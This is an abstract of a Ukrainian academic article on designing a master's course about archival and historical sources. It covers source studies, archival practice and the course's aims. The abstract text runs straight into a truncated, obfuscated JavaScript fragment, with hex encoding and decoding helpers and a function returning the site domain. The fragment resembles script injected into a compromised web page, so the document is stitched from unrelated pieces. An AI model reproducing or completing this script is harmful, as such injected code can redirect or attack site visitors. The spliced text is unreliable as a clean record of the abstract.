Проектування змісту навчальної дисципліни «Робота з архівними / історичними джерелами» - Наталія Олександрівна Терентьєва (Borys Grinchenko Kyiv Metropolitan University, 2016)
У статті представлено лекційний блок (основні питання для вивчення) навчальної робочої програми та основні питання для виконання завдань архівної практики. Наголошено, що предметом вивчення навчальної дисципліни є теоретичні та практичні засади джерелознавства, історичні джерела, архівна справа, робота з архівними фондами. Все це закладає підґрунтя для опанування і підготовки до викладання дисциплін історико-педагогічного спрямування та опрацювання матеріалів для підготовки й написання дослідницьких історико-педагогічних робіт, орієнтує магістрантів щодо історичних аспектів здійснення професійної діяльності, ознайомлює з правилами роботи в архівах, технологіями роботи з історичними джерелами. Окреслено контентнаповнення змістових модулів: 1. Джерелознавство як наука про історичні джерела. 2. Технології роботи з архівними (історичними) джерелами. Метою викладання навчальної дисципліни є формування культури історичного мислення. Цей курс допоможе магістрантам пізнати особливості професійної діяльності викладача вищого навчального закладу, а також адаптуватися до майбутньої професійної діяльності у ВНЗ.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "pedosvita.kubg.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e